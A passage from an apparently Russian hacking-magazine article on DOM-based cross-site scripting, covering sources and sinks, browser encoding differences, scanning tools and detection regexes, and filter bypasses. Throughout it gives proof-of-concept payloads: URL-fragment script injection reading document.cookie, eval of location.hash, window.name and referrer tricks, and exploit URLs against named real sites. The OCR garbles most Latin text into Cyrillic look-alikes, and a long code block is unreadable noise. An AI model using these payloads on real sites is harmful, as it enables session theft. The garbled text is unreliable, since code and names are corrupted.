контролировать, что отображается на странице и что посыла- 
ется на сервер, эмулировать действия пользователя, красть 
данные из формочек... Важно понять, что Х$$ в зависимости 
от ситуации и умения может стать сильным оружием. 

Теперь о классификации. Обычно выделяют «хранимые» 
(«Зогеа Х$$» или «Гуре 2») и «отраженные» («гейецеа Х$$» 
или «Туре 1»). В хранимых мы посылаем Х$$'ку, и она хранит- 
ся на сервере, а дальше мы на эту страницу отправляем поль- 
зователей. В «отраженных» наша Х$$'ка возвращается в теле 
ответа от сервера на конкретный запрос с самой Х$5$. 

Но здесь чего-то не хватает. И как ты, наверное, догадался, 
это — тема сегодняшней статьи ОВОМ Вазеа Х$$ (или Туре 0). 
По разным причинам (часть из которых будет описана далее) 
данный вид Х5$$’ок малоизвестен, даже в наших кругах... Воз- 
можно, это связано с тем, что сканерами их не часто можно 
насканить. Но давай перейдем ктеории. 


ЧТО ТАКОЕ ООМ ВАЗЕО Х$5$? 
Чтобы ответить на вопрос, необходимо прежде понять, 
а что же такое ООМ. Начну издалека, с любимой темы — ХМИ. 

Для ХМЕ есть два основных вида парсеров. Первый — ЗАХ 
(Зпир!е АР! Тог ХМЕ) — это тип парсеров с последовательной 
обработкой документов. Он читает элемент и генерит ивен- 
ты. Требует мало ресурсов, но очень прост. Второй — ВОМ 
(Роситет ОЦЩес{ МоаЕ!) — полностью загружает весь доку- 
мент в память и представляет его в виде дерева. Но что еще 
важнее — он позволяет полностью манипулировать им. Мож- 
но добавлять, удалять, изменять структуру, сами элементы 
(узлы) и их атрибуты. А при чем здесь ХМЕ? При том, что с не- 
которых пор НТМЁЕ является подвидом ХМЕ. 

В общем, данная концепция и используется в браузерах. 
Весь полученный НТМЁ-документ от сервера представляется 
в виде ООМ-дерева в браузере, а кроме того, имеется воз- 
можность менять его, используя стандартный АР! через тот 
или иной язык. В нашем случае это в основном уауасиру. 

ООМ состоит из вложенных друг в друга в иерархиче- 
ском порядке объектов, которые называются узлами (по4е$). 
Каждый узел в структуре представляет располагающийся 
на странице НТМЕ-элемент. Корневой элемент — доситен:. 

Значение, хранящееся в узлах, — текст. К тому же у узлов 
есть атрибуты, к которым также можно обратиться. На рис. 1 
представлен простейший НТМЕ-файл, а также иерархия, ко- 
торую создает у себя браузер. Поподробнее можно почитать 
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Рис. 2.ООМ Вазеа Х$$ 


Рис. 3.Классика 
ООМ Вазеа Х$$ 


про РОМ и попробовать на примерах с ЧауаЗ сир: здесь: аоо. 
зи Е. 

И, как уже было сказано, мы имеем возможность 
из Чауа$сир{ манипулировать ВОМ`ом. А что это нам дает? 
В определенных случаях, используя эти методы (если данные 
некорректно фильтруются), мы можем модифицировать ВОМ 
атакуемого сайта и добиться выполнения нашего Чауа$сир:- 
кода в контексте атакуемого сайта. То есть суть — та же Х$5. 

Простейший пример: 


<Боду> 
<5сг1рЕ>аоситеп* .мг1Те (оса 1оп.Пге+);</зсг1ре> 
</боду> 


Получив такую НТМЁку, браузер исполнит уауаЗспйр{-код 
и допишет в тело страницы (доситет.мище) строку, взяв ее 
значение из 1осаНоп.пПге?. Проблема здесь в том, что хакер 
может контролировать значение |осайоп.ПгЕТ и вставить свой 
ЧауаЗсирт, который также будет исполнен. То есть если эта 
страница — {е${.Мт1, то, чтобы добавить свой код, нам надо, 
чтобы наша жертва перешла по следующему ЦВЕ (см. рис. 2): 


ВЕЕр: / /м1сЕ1мт. сом/Фе${ .И{т1#<$сг1рЕ>а1ег{+ 
(аоситеп* .соок1е);</зсг1рЕ> 


Здесь важно отметить, что в Егех данный пример не за- 
работает. Для 1Е и СИготе необходимо именно перейти 
по ссылке, а не просто написать в адресной строке скрипт, 
так как во втором случае все будет за/Р\енкожено перед 
исполнением кода (станет вида «%3ЗСзсир%3ЗЕаещ(1);%3С/ 
$сир1%3Е»). 
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Зато второй пример будет рабочим для всех: 


<Боду> 
<5сг1ре> 
\аг 1 = Т1оса1оп.Па$И. $11се(1); 
е\а1 (1); 
</$сг1ре> 
</Боау> 


Эксплуатация: 


ВЕЕр: //м1сЕ1т. сот/Фе${_е\уа1.И{т1#а1ег+ + 
(аоситеп* . соок1е) 


Вариант Х$$ чуть более нестандартный: 


<Боду> 
<р>Не11о му м1паом пате 15: 
<5сг1р>аоситеп* . мг1{е (м1пдом.пате);</зсг1ре> 
</р> 
</Боду> 


Эксплуатация (открываем страницу жертвы с нашей, что- 
бы мы могли контролировать \мипдом..пате) — рис. 4: 


<$сг1р>м1паом.ореп("ПЕТр : //му1тсЕ1т.сот/Ее$ м1пдоим . <= 


Вт", "<5сг1рЕ>а1еге('Х$5')</зсг" + "1рф>", "", + 


+а15е);</зсг1ре> 


Надеюсь, стало понятно, откуда растут ноги для ВОМ Х$5. 


ТЕРМИНОЛОГИЯ? 

Сама атака, как ни странно, очень бородатая. Как минимум 
В 2005 году Амит Клейн (Ати Кет, чоо.а/ООБЗи) написал 
осмысленную идею о третьем виде Х$$’ок, хотя сами РОМ 
Х$5 уже находили и до этого. В его работе был представлен 
некий список того, откуда могут прийти данные от пользова- 
теля (рис. 5) и какие опасные функции могут привести кх$$'ке 
(рис. 6). Но, как ни странно, тема была развита и переосмыс- 
лена за последние годы — во многом благодаря таким людям, 
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как Стефано Ди Паола (З{еТапо О! Раоа) и Марио Хайдерих 
(Мапо Неаепсп). 

Самое главное, выработалась некая терминология — то, 
что мы контролируем и можем передать странице, называет- 
СЯ «зоцгСе», а итог — то, куда данные приходят, опасные функ- 
ции, с помощью которых мы можем произвести атаку и про- 
эксплуатировать нашу Х$$’ку, — называется «зткК». Русских 
аналогов терминов даже пытаться искать не буду. 

И если зтК’и относительно не сильно изменились (до- 
полнились), то понимание зоигсе’ов сильно разрослось, 
что несколько меняет понимание атаки (ее классификацию), 
но об этом чуть позже. 

Здесь важно понимать, что есть что в принципе. Подроб- 
ностей слишком много. А потому одним из значимых ресурсов 
при копании ВОМ Х$$ будет проект аотх$$м/К! (аоо.аИуус\м.), 
на котором представлен список основных $оигсе и К, а так- 
же тонкости их в контексте различных браузеров. 

Так вот, о новой классификации, которую спецы из Азрещ 
бесищу недавно представили (в качестве троллинга, навер- 
ное) — см. рис. 7. Классификация эта точна и подчеркивает 
суть РОМ Х$$. Не важно, откуда получаются входные дан- 
ные от злоумышленника (из конкретного ответа сервера, 
от клиента, со статической части страницы) — важно, что они 
используются в критичных функциях клиентской частью. На- 
пример, представь ситуацию, что мы можем отправить свой 
никнейм на сервер и он будет где-то там храниться, — по- 
тенциал для Зогеа Х$$ есть. Но если нам помешает филь- 
трация — мы, казалось бы, уже и не можем ничего сделать. 
А если наш никнейм используется где-то еще, но уже в кон- 
тексте клиентской стороны и при этом используется где-то 
для модификации ООМ’а? Получается, мы имеем вторую 
попытку для ХЗЗ’ки (теперь уже РОМ Х$5$), так как, возмож- 
но, нам и не понадобятся те символы, которые нужны были 
для Эюгеа Х$$, но были отфильтрованы на сервере. 

В чем суть этой части? В том, чтобы дать тебе понять, 
что есть важные общие понятия, но ВОМ Х$5$ — это очень 
специфичная и нетривиальная во многом вещь. 


СПЕЦИФИКАООМ Х$$ 
Итак, после общих размышлений натему и нескольких приме- 
ров, что мы можем выделить специфичного в ВОМ Х$$? 

Во-первых, РОМ Х$5$ — это прежде всего проблема кли- 
ентской стороны веб-приложения. Уточню: это не проблема 
клиента, а проблема клиентской части приложения. Это не- 
корректная фильтрация/использование данных, получен- 
ных из недоверенных источников, в клиентской части веб- 
приложения, то есть в основном в ЧамаЗсиру. 

У этого пункта есть несколько последствий. РОМ Х$$ мо- 
жет быть на «любой» странице, даже на обычной НТМЁке, 
если там используется уауаЗсиру. 

Раньше поиск уязвимостей концентрировался на скрип- 
тах, на страницах, где мы могли вводить какие-то данные, 


® \УМтие гам НТМ... е.2.: 
© доситепт.игтте(_) 
© доситепт.мгтте]"т() 
© доситепт. Боду. тппегНот] = 
® Пттес|у поднуше фе РОМ (иде ОНТМУ. еуети$), е.2.: 
© доситепи. Гоги$ [0] .асетоп=_ (ап уаноц$ офег соПесНоп$) 
© доситепе. а СасНЕуеп\ (..) 
о доситепе. сгеахе_(_) 
© доситепт. ехесСоттапЯ () 
© доситеп".Боду. _ (ассеззше Фе СОМ Фгоцей Фе Боду обес) 
© итидом. аттасНЕуепт (.) 
» Керастшв Фе досшиети СВТ, е.в.: 
© доситепт. Тосат1оп= (ап азия © 1осаноп”$ Вгеб, №051 апд Возтате)) 
о доситепт . Тосат1топ. поз тпаюе 
доситепт . Тосаттоп. гер1асе() 
о досивейт. Тосат1оп. а5$1а91(С_) 
о аосищепт. ив 
и1идом. пау1дате(_) 
® ОрешиазЛшодИуша а улиоху, е.а.: 
© доситепт.ореп(.) 
о ум1пдом. ореп(..) 
о м1тдом. 1осатлоп.ПгеР-.. (ап азуашиая © |юсанои”5$ Вге, №051 ап 
Возтате) 
® Путес|Цу ехесиие зсп1рь, е.р.: 
о еуа1(_) 
© мтпдом. ехес$сгтрт(..) 
© м1пдом. 5етТттегуа] (С...) 
© мпдом. зетт1тесит (..) 
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а также страницах, где мы получали итог, — при этом стати- 
ческие странички были неинтересны как таковые. Теперь же 
даже «статика» может принести уязвимость. 

Достаточно часто для ООМ Х$$ нам вообще не надо по- 
сылать Х$$’ку на сервер. Три приведенных выше примера — 
тому подтверждение. Для первых двух примеров важно от- 
метить, что браузеры (согласно стандартам) не отправляют 
на сервер то, что находится после символа «#». Это Егадтет 
'епийег — специальная часть ЧН|!-схемы, используемая из- 
начально, для создания ссылок на части документа. Пример 
с вики: «ПЁр://м\умм.ехатр!е.ога/Лоо.Птит баг» ссылается 
на элемент с 14=Баг на странице Тоо.П{т!. Его фишка в том, 
что он не отправляется на сервер, но доступен из ЧауаЗсиру. 
Такой идентификатор постоянно используется в мер 2.0 сай- 
тах (сервис тай тому пример). 

Так вот, «ПЁр://мсит.сотАез. т #<зсир>аец(аоситеит. 
сооке);</зсир{>» из первого примера заставит сделать бра- 
узер запрос к 1ез{.п1т1, но без ХЗЗ'’ки, а в 4$ будет полная 
строка. И никакие средства серверной защиты (фильтрация 
пользовательских данных, всевозможные \МАЕ или 1Р5) не сра- 
ботают. Проблема лежит в основном на клиентской части веб- 
приложения. Это первое замечание. Во-вторых, мы, как пра- 
вило, не можем использовать стандартные техники и средства, 
которыми пользуемся для выявления классических Х$$’ок 
и 5ОЕЁ-инъекций, так как они рассчитаны именно на выявление 
серверных проблем. В-третьих, хотя мы, по сути, и имеем воз- 
можность доступа к исходникам (ЧауаЗспр\-то доставляется 
клиенту), но правильно и глубоко искать такие уязвимости — 
очень нетривиальная задача. Тонкостей и хитростей — хоть 
лопатой копай :). 


ТРУДНОСТИ И ФИШЕЧКИ 

Итак, в продолжение последнего пункта, хочется привести 
показательную картинку из презентации Стефано Ди Паолы 
(рис. 10). Анализировать уЧауа$ спирт — ужасное дело, особен- 
но стандартными средствами. Да, Марио Хайдерих написал 
два регэкспа для выявления основных $зК и $оигсе: 


/((гс |пге+ | даа | Тоса1оп | соае | ма1ие | ас&1оп) 
5*["' гер1асе | а5$15п | пау1ва{е 
5е{ВезропзеНеадег | ореп(О1а1ор) ? | $ПомМода101а108 | 
е\а1 | еуа1ца*е | ехесСоттапа | ехес$сг1р* | зе Т1теоц* | 
зе{Тпфегуа1)\5*["'\]]*\5*\ ()/ 


*\5*\+?\5*= 


/(ЛосаЕ1оп\$*[\[.])|1([.\[]\$*["']?\5$* (агритеп*$ 

| а1а1овАгвитеп{$ | 1ппегНТМЕ |мг14е(1п)? | ореп(01а10о5)? 
:| зпомМода101а1ов | сооК1е | УВЕ | аоситеп ИВТ | БазеувТ | 
гефеггег | пате | орепег | рагеп* | {ор | сопфеп* | <е1+ | 
{гатез)\м) | (1оса15%огаве | зе5$1оп5{огаве | Вафабазе) / 


Но ведь надо пройтись по всему дайаНо\,, чтобы понять, от- 
куда и что берется, куда и как попадает... Мало этого, кроме 
поиска потенциальной РОМ Х$$-уязвимости, надо еще и на- 
писать под нее эксплойт. А браузеры — разные, и, что хуже, 
поведение их различно. Не говоря уж от том, что в браузерах 
есть средства противодействии отраженным Х$$’кам — и их 
также приходится обходить. 


ООМ-Вазеа 
(Тта4аНюопа!) ВеНйемеа Х$$ 
ВеНежеа Х$$ (Аза от 
зегуег) 


Рис. 7. Новая класси- 
фикация? 


"Риге ВОМ- 
Вазеа Вейесхеа 
Х$$ (ааа Нот 
ООМ) 


МЕТОДЫ ВЫЯВЛЕНИЯ 


Изначально я планировал статью про тестирова- 
ние различных средств, которые помогают искать 
нам РОМ Х$$5. Но когда я столкнулся с непово- 
ротливостью и неудобностью многих решений — 
желание мое, честно говоря, отпало. К тому 

же даже у лучших инструментов были четкие 

проблемы с детектом Х$$’ок. Поэтому я приведу 

общий список утилит с небольшим описанием: 

1. Ооттаюг Рго (900.9/561йС). Динамический 
анализ. Измененный ЕЁ платный продукт. 

2. Ооттаюг Соттипйу (ч00.49/41а25). Бес- 
платная версия предыдущего инструмента. 
Не обновлялась с 2010 года. Идейно хороша, 
но неюзабельна из-за недоделанности. Что- 
бы не мучиться, качай сразу виртуалку. 

3. ООМ Зпйсй (доо.а/П\УОВВ). Полезный аддон 
для Спготе. 

4. ВА.20ОМ Х$$ зсаппег (доо.аИЕм/26К). 
Извращенная надстройка к ЕЕ (что при- 
мечательно, требует локальный веб-сервер 
и МУ$ОЕ). Принцип действия — фаззинг. 

5. НоГг\МАЗР (чаоо.а14ОаВ8). Опишу так: как бы 
динамический анализ. 

6. ООМ $сап, ООМТгасег (доо.а/МИЗЕУ) — ад- 

доны для |Е, ЕЕ На мой взгляд, неюзабельны 

для нормального анализа, но, возможно, 
полезны как дополнительные тулзы. 

Асипейх (асипейх.сог). Не тестил. 

8. СкрипткВигр (аоо.а/ВЖКЕ$). Ищет по ука- 
занным в статье гедехр’ам потенциальные 
ООМ Х$$5. 


г 


Лично мой выбор падает на Воттагюг Рго. 
Да, он платный, но это решаемо. Для автомати- 
зированного поиска, особенно в крупных про- 
ектах или «по-быстрому», — самое оно. С другой 
стороны, по личному опыту могу сказать, 
что, если использовать только его, можно «прой- 
ти мимо гриба, торчащего на полянке». 

Приведу два примера. Во-первых, пример 
с Нех. Как там отмечено, рагет в ЕЕ недоступен 
для 4$ в дочернем окне. А потому Воттатог 
Рго, попав на страницу с потенциальной ВОМ 
Х$$, «завалится» в тот момент, как /$ попросит 
доступа к рагет\ф, и не сможет указать на нее. 
Проблема здесь, вероятно, в глубокой связке 
Ооттаюга и ЕЕ 

Во-вторых, недавно нашел РОМ Х$5, 
который делал даоситет.миЩе данных из УВЕ, 
но только в том случае, когда в УАЕ был специ- 
альный параметр. Вроде бы ситуация была 
простая, но Воттатог Рго не нашел ничего 
подозрительного. Возможно, это связано с тем, 
что параметр специально можно было выцепить 
только из исходников. В смысле для активации 
его не было никаких предпосылок. То есть такие 
«слепые» моменты существуют, и это надо 
учитывать. 

Мне кажется, что оптимальным вариантом 
было бы совмещение статического и динами- 
ческого анализа. Хорошее комбо: Вотта{юг 
Рго и Гоп\ММАЗР / скрипт для Вигр. Последние 
два смогут просветить «слепые» места за счет 
чистого поиска по гедехр’ам (вот только рас- 
ширить их надо на фреймворки). 


$4 Взлом 


“‘.-..-.-[--.--- 


и + 


4: ООМ-Ва5ед 5$10гед Х$5 
5$ет Меззаре: ВоБ (Ма АЛАХ Меззаве Велпема!) 
Меззаке Воду: — \МВаг’; юг дтпег? 


3: ООМ-Вазед ВеЯецмед Х$$ 
(Ма АЛАХ Вецие5\/Везроптзе 


$+оге Меззаре оп $егмег 


| 
2: Риге' ООМ-Вазед 
Зое Х$$ 


Если взять первый пример и значение в 1осайоп.ПгЕТ, 
то в нем хранится УВЕ (общее представление): 


°сПеште : / /изег : ра5@По$*/ра{ПН/фо/разе.ехЕ/ 
Ра{И1пРо ; 5ет1со1оп?5еагсй . оса 1оп=уа1ие#па$П=уа1и 
е&Па$Н2=\уа1ие2 


А браузеры по-разному ипепсоа’ят данные УВЕ. Ететох, 
например, кодирует символы <> после #, а 1Е не кодирует. 
[Е: 


ПЕЕр: //Во${/раИ/Фо/разе.ех*/{е{%3Са%22 '%0А%60=« 
%20-+%20%3Е ; {е5{%3Са%22 '%0А%60=%20+%20%3Е ?{е$Е+ 
‹а" '%0А` =%20-+%20>; НЕез{‹а" '%90А` =%20+%20>; 


ЕЕ 


ВЕЕр : //Во$* /ра*И/Фо/раде.ех{/е${%3Са%22%27%0А%60=« = 
%20-+%20%3Е ; е5{%3Са%22%27%0А%60=%20+%2%3Е ?+е5{%3Са+= 
%22%27%0А%60=%20+%20%3Е ; #е5{%3Са%22%27%0А%60=%20++« = 
%20%3Е; 


Потому первая атака будет годна только для Е, Спготе. 
В то же время, если бы уязвимая страница имела код 


<Боду> 
<5сг1рЕ>аоситеп* .мг1*е (1оса1оп.ПазИ);</зсг1ре> 


</Боау> Е. 


<!--используется 1оса1оп.ПазИ вместо оса 1оп.Нге+--> 


то эксплойт бы заработал во всех браузерах, так как ЕР 
для этого объекта хранит значение в раскодированном виде. 

Далее, еще один пример браузерных триков. Есть, напри- 
мер, уязвимая страница, которая добавляет в скрипт только 
имя сервера из ге{егег: 


доситепЕ .мг1е(" <$сг1ре згс=" Ир: / /Но$* /1таде. «= 
212% ='+(гефеггег. $р11%("/")[2])+'></зсг1рЕ>'); 


Казалось бы, что тут можно сделать? Да, мы можем влиять 
на гетегег! Все, что нам необходимо, — заманить на наш сайт 
пользователя и редиректнуть его с необходимой нам страни- 
цы на уязвимую. Таким образом мы повлияем на поле геТегег. 

Но здесь вроде начинается облом... Ан нет. Стефано вы- 
яснил, что 1Е поддерживает спецсимволы в имени хоста. 
То есть можем создать поддомен у себя «<5спрЕ>аеги1); 
</зспр{>.ем.сот» или, как в примере Стефано, 
«“опгеааучаеспаптде=еуа(пате).аЦаскег.сот». 

Кроме браузерных штук и различностей нативного 
Чауа$спир{-кода, есть еще и всевозможные .$-фреймворки, 
которые используются более чем повсеместно. Тот же |Очцегу 
имеет множество оберток над стандартными зтК’ами (см. 
рис. 11). 


Рис. 8. Новая версия 


типов 5оигсе меняет 


классификацию 


Рис. 9. Откуда (новая 
версия)... 
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ОБХОДИМ ФИЛЬТРЫ 
Надеюсь, понимание относительно РОМ Х$$ начало появ- 
ляться. Теперь косвенно коснемся защиты. Конечно, про- 
стейший вариант — отказаться от 4$ на клиентской стороне :). 
Но понятно, что это нереально. Следующий вариант — не ис- 
пользовать безопасные функции изменения ООМ’а, а так- 
же внедрить фильтрование пользовательских данных... Но, 
как ты, наверное, заметил, РОМ Х$$ — это та еще темка. Это 
как некая разноцветная бурлящая сущность, не имеющая 
особых границ. Потому и понимание толкового в массах нет, 
а потому и с точки зрения защиты ошибок допускается много. 

Не так давно прочитал отличную статью (900.4/50И7), 
которую мы сейчас и разберем. В ней описаны два приме- 
ра «безопасного» изменения ООМ’а за счет использования 
фильтрации пользовательских данных. 

Пример 1. Использование вететехСощей который 
применяется для задания/чтения значения текста какого-либо 
узла. Используется также для фильтрации НТМЕ(. Например: 


уаг 41\у = аоситеп* . сгеафеЕ1етеп"* ( "41\'); 
а1\у.1ппегНТМЕ = 'Не11о ‹а Пгет=" Пр: //Боб. сот" >= 
Воб</а>!'; 

соп5о1е. 1о8 (41\.+ехЕСоп®епт); 

// Не]11о ВоЬ!; 


Здесь амлежСощепт вырезал «<а Пге="ПИр://БоьЬ. 
сот">Воб</а>» при добавлении элемента. Вроде бы без- 
опасно и Х$5$'ку добавить мы не можем? А вот и нет. У этого 
метода есть фича: он НТМ!-сущности (еп Му) преобразует об- 
ратно в НТМЕИ: 


уаг 41\ = аоситеп*. сгеафеЕ1етеп"* ( "41\'); 
А1у.1ппегнНтМЕ = 'Не11о ‹а>&1{; $сг1рЕ&8* ; += 
а1ег* ( &ачот ; ! &ацо{; )&1%; /5сг1рЕ&еЕ;</а>!'; 
соп5о1е. 108 (41\.+ехЕСоп*епт); 

// Не11о <5сг1рЕ>а1ег* ("1") </зсг1ре>! 


То есть с небольшими махинациями мы можем достаточно 
просто внедрить Х$5’ку. Если воспользоваться этим методом 
несколько в другой последовательности 


уаг а1\ = аоситеп*. сгеахеЕ1етеп"* ( "41\'); 
А1у.+ехЕСопфепт{ = '<зрап>Роо & Баг</5рап>'; 
соп5о1Те. 1о8 (а41\.1ппегнтМЕ) 

1/_& у; зрап&2*;ЕРоо &атр; Баг&1{; /зрап&2*; 


то получится опять-таки вроде бы вполне безопасный ре- 
зультат. Автор отмечает, что аоситет.сгежеТежМоае име- 
ет аналогичное поведение. Символы <, >, & были замене- 
ны на соответствующие сущности. И этим методом также 
пользуются для «фильтрации». Но ты, наверное, заметил, 
что здесь в фильтрации отсутствует достаточно важный сим- 
вол — кавычка. А этот факт из теории классических Х$$ напо- 


ра син Атроитет Гроет 


алк 


ыы 


Гы 


СигесЧу Ргогп Ве изег. 


| е.., опепег(), опсИсК(), зцЬгтИ: Библ ... 


| Ипа ом. * 


#2 | ипсНоп ВапЧеКеюадСотет*() { 
# (РЕрОБгеадубтате == 4 | | ВИрОБ] геадуае=="сотрИее") 
{ 


маггезий = Фоситет. ве етеги Ву! ("таВоду"); 
(сев упеннтми = ВИрОБ).гезропзеТехЕ; 
Бат «йе = 


р > 2—2 | 39 рагу сомепит 
| #5 и Зате Опт. 


3'9 Рагу бегуег 


тапЧага НТТР Кезропсе 


ХНВ Везропзе | 


лилии зении С 
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минает нам о возможности эксплуатации Х$$ на основе ивен- 
тов (еуеп{), что и показывает на примере автор: 


В поисках лазеек 


ТВ о на ею статы, <, “Ц: -*”“- ‘ыы. =>>.-Фы д ©. ъ..ыоъуююьь г ‘..`ъ>2.ЦЩъы. 


Фипсфтоп ОТТ 1а$1Сотвепи ( ) {Отт _ соввегА Му =$( * 1$ 5 чесовает $”) .1а51С11 19; ОТТ_ соввеп+ Мау 
_Л4+19рге#1х;ОТТ_а\1Ог1оаЬе1 $= а Огтогаье1 $} _зе1ес* АЛ 1 155ие5=0ОТТ _5е1ес1 А\ 1 1551е$; _5е\1ес{ 
_ореп15зиеИрда* еРоге=ОТТ _ орепТ 55 ие ра еРога; _аддАКасввеп Рле1 95=01Т _ аддА* 1 аспвеп* Е1е1 95 
Ра 10 Ао=ОТТ 191 194 Вом; _Взо 19 Роса Баск=ОТТ №1991 19 Рома Баск ; _Я оа1 Мефад 
сот гаМоуе1 54 а105=0ТТ _ сот га№уе1 51 а1и5; _ сот га№уе\ ГаБе\=ОТТ соп+1 ги№ме ГаБе\ ;_уа\1 
`асто= _ ас_воизеоуег; _ас5е=_ ас _зе\ес{; _асгоь= _ас_геа\ опиг; а1 1 Со\ цапМаве$= | |; _9еСо\ ре 
_ зРомТпфоРееК=ОТТ _зНом1поРееК; _В1деТпфоРееК=ОТТ В1деТптфоРееК; _#1г54 Совшег“ =ОТТ +1г5\ Сова 
Зопселоп _ас сапсе\ ( ) {ас_зирргез$Совр\ е{ 10п$=! 0; ас _ирдафеСотр\ ей 10154 ( 11) }Фопеетоп ас _а 
Фипс4топ эс _Кеуечеги _ (а){уаг а=а| |м1пдом. еуег\ ‚Б=а.Загоей | |а. згсЕ\ евеп( ;1+( "ТМРОТ*==Ь .4а9 
9,е) ; +=ас _совр\ е 4 1оп555ас _ сошр\ е411оп5, 1епо\В>0; 9=!1; 1+(6661) 9=!ас $иррге5$Совр\ е{ 101555! | 
ФипсА1оп ас _геа\ оп иг(){1+(ас_ФосизедТприй } ас_ФосизедТприй .опЬТиг=ас _©\ 98\ игНап ег; ас 
АС 51оге.ргофо\фуре. сошр\ е{ 10п5=Фипс4 топ ( } {а\егЕ “ИМ МРЕЕМЕМТЕО совр\ е411оп5")}; _АС_${оге. 

Фипе 1 оп _АС_ блар1е5{оге( а) {41$ , #1г54 СБагМар_={};Фог(узг Б=0;Б<а.1епо1В; ++5) {узг с=а[Ь]: 

_АС _Злар1ез{оге. ргофофуре. совр\ етаБ\ е=Фипс11оп(а,Ь) {Фог(уаг с=0, 4=0,е=0;е<6;++е){уаг +=а. 

АС З1ар1е5{оге .ргоф оф уре, сошр\ е{ 10п5=Фипс41оп(а,Ъ) {1+ 1а) гебиги[ ] ;уаг с=РедЕхр( *^(.*[\\$ 
АС `лер1 ет оге. ргофофуре . аикозе\1 ес1Раг$ 1 Вом=Фипсфтоп( ) {гефигп! 0} ; Фипс41оп _АС_СоврагеАСС 
АС  Совр\е4зоп. ргофофуре. 1054 г1по=Фипс4 топ ( ) {гефигп” (АС _Совр\е{1оп: “+4Н1$. уа\ше+* } *}; чаг 
Фопеезоп ас _Лап\еКеу_(а,Ь,с) {ас _снескСовр\ е110п5( ) ; уаг | 4=!0, е=ас_сошр\е{10п5?ас_сотр\е{1 
1) }}1+(6) м1 сп(а){сазе 27:сазе 13:сазе 38:сазе 40:сазе 39:сазе 37:сазе 9:сазе 16:сазе 8: 
Фипс4аоп ас совр\ефе(){уаг а=ас_9е4Саге{Ро$141оп_(ас_ФосизедТтрий ),Ь=ас совр е1оп$[ас_5е 
(Б=с, сгеакеТех4{Рапде( ),Ь.со\Парзе( 10) ,Ь.воуе( “сПагастег”,а),Ь. е\ес* ( } )Уузаг ас _ечегТуред= 
Фипс4зоп ас_спескСомр\ е{1оп$( ) {1+(ас_5ирргез$Сотр\ е{10п5} ас_совр\ е{10п$=ас 1а$1 Совр\ ета 1 
Ь) ; ас _;ес{е4=- 1; ог(Ь=0;6<ас _сотр\е4{1оп$. Тепае В; ++6 )1+(с==ас _сошр\ езоп$[Ь] . уа\ ие) {ас_$ 
Фипсатоп ас _мрда{ еСотр\ е{ 10711 $1 (а) {уаг Б=досивет\ . де Е евеп1 ВуТФ( *ас-1151”); 1+(а&бас_сов 
а.ризв(ас_ сотр е{ 1015 [ 9] .Реадапо, *</4№></4г>*} ,с++;е|\5е{уаг е=”опвоизедомт” ; пауз да\ог.изе 
Ь. 51 у1е.1е=а.х+"рх”;Ь. 54 у1е.фор=а.у+а.Н+"рх”;Ь. 51у\е. да5р1ау=" *;мапдом. 5е1Тавеоц (ас _ач 
Фипсфтоп ас_ргеТех4ТоНиж\ (а) {гефигп а. гер\асе( /&/9, "бавр; "). гер\асе( /</9, "&\1;"). гер\асе( 
Фипсф1оп ас_9е1Саге{Ро$1410п_(а) {1+( "ТМА" ==а.4а9Маве) {узг Б=а. уа\ ие. 1еп91Н;1+1(у019 0!=а 


Рис. 10. Анализ 
Чауа$ сир+ — неблаго- 
дарное занятие 


ФипсЕ1оп езсареНт1 (г) { 


\аг 41\у = аоситеп*. сгеажеЕ1етеп* ( 'а1\у'); Рис. 11. Очегуи другие 


А1\.аррепаСсп11а (аоситеп* . сгеафеТех Моде ($%г)); фреймворки еще боль- 


гефигп 41у.1ппегенНТМЕ; ше затрудняют анализ 


е 


маг изегмеб$1*е = 


опточзеоуег="а1ег*. ! 


(\‘4егр\")" "*; 


уаг а 


'‹а Иге{="' + езсаренН®т1 +» 


(изегмеб$1%е) + '">ВобБ</а>'; 


уаг А1у = аоситеп* .вееЕ1етепВуТа( 'Тагэет'); 
91\.1ппегН&т1 = ргой1еЁ1ик; 
// ‹а Вге+="" оптоизеоуег=" а1ег* ( '4егр')" "">Воб</а> 


Как ни странно, проблема растягивается и «перетекает» 


в другие решения. Например, |Очегу имеетте же особенности 
в 4ех(). Вдобавок в той же Чотх$5\мК! можно почерпнуть не- 
которую информацию о фильтрации. 


РЕАЛЬНОСТЬ 
Пара примеров. Во-первых, классический вариант, который 
был найден в Тмщеге: 


(РипсЕ1оп(&){маг а=1оса1оп.Пгеф+. $р11% ("#1") = 


[1];1+(а){=.1осае1оп=2.НВВ=а; }}) (м1паом); 


Х$5‘’ка, как ни странно, была тривиальной: 


ПЕЁр: //Ем1 ег. сом/#! дауазсг1рт : а1ег* (доситейе* . = 


ота1п); 


Происходит 


подстановка псевдохэндера ]ауазсир\т 


в ПосанНоп и, как следствие, исполнение нашего кода. 


//а1зр1ау Пе соггесЕ Фаб Базе оп {Пе иг1 (#пате) 


Современный пример с сайта А\/С: 


\уаг раПпате 


$(Лоса{1оп) .аеЕг('Иге#') ;у+= 


уаг иг1ТрагЕ$ = 


раппате . $р114 ("#"); 


Эксплуатация опять-таки тривиальна: 


Пр: //мм . амё. сот/еч-еп/аомп1оаа#" >«= МАВММС 
<1тв згс=х опеггог=рготр* (/х$$/); > 
Вся информация предо- 

Далее чуть более странный пример, когда вроде как уяз- ставлена исключительно 
вимость близка, но проэксплуатировать ее непросто. Данная в ознакомительных 
уязвимость была найдена в АдоБе Нех 3. Уязвимая страни- целях. Ни редакция, 
ца — /п1${огу/Ги${огуЕгате. т! — до сих пор массово нахо- ни автор не несут от- 
дится в Сети (в том числе на «мощных» порталах). ветственности за любой 


КипсЕ топ ргосе$$Иг1() { 


возможный вред, при- 
чиненный материалами 


уаг роз = иг1.1паехО+("?" 


данной статьи. 


$5 


Чамазспр\-методы, которые обновляют ООМ напрямую 


‚аНег() .ргерепаТо() 
_ орд вов — 
‚аррепаТо() ‚герасе\\ии() 
о мм 
Вт) мигар() 
__ мдм мм 
„пзейВеТоге() мгарштпег() 


М.В. Не используй эти методы |Очегу для не прошедших вали- 
дацию данных или тщательно фильтруй их. 


иг1 = ро$ |= -1 ? иг1.5и65"(ро$ + 1) :""; 
1+ (!рагепе._1е вг51оаа) { 
рагепЕ{ .ВгомзегН1 $Фогу. зе ВгомзегИВЕ (иг1); 


гу { ЕВЕ, 


рагеп{ .ВгомзегН1$Фогу.БгомзегИВЕСВапее (иг1); 


} сафсй (е) {} 


} е15е { 
рагеп*._1е_Аг$5{1оа = +а15е; 
} 
|. 
уаг иг1 = аоситеп* . оса 1оп .Пгеф; 


ргосе$5Иг1(); 
доситеп{ .мг1е(иг1); 


Если взглянуть на последние строчки, то кажется — 
